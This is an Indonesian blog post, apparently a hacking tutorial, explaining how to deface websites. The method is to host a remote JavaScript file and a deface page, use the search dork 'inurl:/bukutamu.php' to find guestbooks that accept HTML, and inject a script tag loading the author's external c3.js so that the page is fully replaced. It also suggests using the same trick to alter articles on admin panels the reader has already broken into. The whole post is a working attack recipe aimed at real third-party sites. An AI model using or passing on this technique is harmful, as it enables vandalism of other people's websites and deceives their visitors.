Full Deface Using Javascript Load



Assalamaualaikum warrohmatullohi wabarokatu ...
Pada kesempatan kali ini saya akan berbagi trik / tektik deface lagi nihhh haha wahh udah lama ..
"Full Deface Using Javascript Load"
sebelumnya thanks to devilscream a.k.a riswanda yang telah memberi masukannya .. :3

Langsung aja deh yukk ...

Bahan yang kita perlukan adalah :
+++++++++++++++++++++++++++++++++++++++++
JS : lihat script http://peluru-cms.cf/c3.js
Script deface kalian
Hosting pribadi
+++++++++++++++++++++++++++++++++++++++++

Pertama ambilah script c3.js diweb saya tadi ,, kemudian siapkan script deface kalian dan hosting kalian
bisa pake hosting gratis nih yang gk punya di http://idhostinger.com daftar aja gratiss ..
Sebelum kalian upload c3.js ,, terlebih dahulu edit edit yang sekiranya harus diedit ...
coba perhatikan gambar dibawah ini :

Nah pada bagian yang dilinkaran merah tersebut ,, itu adalah lokasi script untuk deface kamu ..
http://peluru-cms.cf itu adalah website saya dan saya mengupload JS dan script deface saya disana ,,

Uploadlah JS yang telah kamu edit dan script deface kamu ke hosting website kamu ..
mengerti ??
Lanjut ke bagian klimaxx !!

Gunakan Dork 
++++++++++++++++++++++++++++++++++
inurl:/bukutamu.php
++++++++++++++++++++++++++++++++++

Sudah tau kan cara menggunakan dork ?? okeh tinggal pilih pilih website yang sekiranya vuln ,, website yang vuln adalah website yang bisa disisipkan script html 
contoh seperti punya saya


Disana saya akan menyisipkan sebuah kode pemanggilan javascript ,,
yap apa sudah punya gambaran ??
Ya sebenarnya saya memanfaatkan kode pemanggilan tersebut untuk membuat halaman saya sisipkan script menjadi FULL DEFACE !!
perhatikan gambar diatas ^^
saya menyisikan script
<script src="http://peluru-cms.cf/c3.js" type="text/javascript></script>

lihat pada bagian link tersebut ,, itu adalah lokasi javascript saya berada ,, nantinya script tersebut akan memanggil javascript dan javascript akan memanggil script deface kamuu ... lumayan ribet yah :v haha
nah ini juga bisa digunain untuk edit article diweb admin yang telah kamu masuki ^_^
nahhh saya hanya akan menjelaskan sampai disini selebihnya silahkan deh kalian ulik ulik sendiri ^_^
Terimakasih wassalam ^_^

Subscribe To Get Best Articles!

Jika menurut kalian artikel di blog ini berkualitas dan bermanfaat, silahkan berlangganan artikel terbaru melalui pesan masuk email anda secara gratis.

No comments:

Post a Comment

" Terimakasih telah mengunjungi blog kami ,, silahkan tinggalkan komentar untuk menghargai jerit payah penulis ^_^ "